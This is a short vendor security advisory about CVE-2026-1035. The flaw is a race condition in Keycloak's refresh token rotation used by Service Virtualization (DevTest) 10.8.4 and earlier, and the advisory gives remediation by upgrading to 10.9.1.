A security vulnerability (CVE-2026-1035) has been identified in the Keycloak server used by the IAM component of Service Virtualization (DevTest). The vulnerability involves the `TokenManager` class failing to perform atomic validation and updates when strict refresh token rotation is enabled. This allow concurrent refresh requests to bypass single-use enforcement, potentially undermining refresh token rotation hardening.

Product: Service Virtualization (DevTest)
Component: Identity and Access Management (IAM) / Keycloak
Versions: 10.8.4 and earlier supported releases

The issue is a race condition in the Keycloak `TokenManager` where usage updates for refresh tokens are not performed atomically, allowing multiple access tokens to be issued from the same refresh token during concurrent requests.

This third-party vulnerability is addressed by Keycloak and the fix is scheduled to be included in the **DevTest 10.9.1** release.

To remediate this issue, upgrade to DevTest 10.9.1 when it becomes generally available. This release is currently scheduled for the end of April 2026.

Note:If an immediate remediation is required before the release, please contact Broadcom Support to discuss potential security exceptions or interim workarounds based on your specific deployment configuration.